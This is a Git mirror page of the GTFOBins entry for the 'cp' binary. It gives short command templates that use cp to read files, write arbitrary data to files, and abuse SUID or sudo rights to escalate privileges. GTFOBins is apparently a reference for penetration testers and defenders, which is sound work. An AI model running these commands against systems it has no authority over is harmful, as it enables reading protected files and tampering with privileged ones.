1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-19 01:59:37 +02:00
GTFOBins.github.io/_gtfobins/cp.md
Andrea Cardaci 2e55528e82 Add cp file-write
Along the lines of #122.
2020-03-21 19:24:30 +01:00

898 B

functions
file-read file-write suid sudo
code
LFILE=file_to_read cp "$LFILE" /dev/stdout
code
LFILE=file_to_write echo "DATA" | cp /dev/stdin "$LFILE"
code
LFILE=file_to_write echo "DATA" | ./cp /dev/stdin "$LFILE"
description code
This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF ./cp $TF $LFILE
code
LFILE=file_to_write echo "DATA" | sudo cp /dev/stdin "$LFILE"
description code
This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF sudo cp $TF $LFILE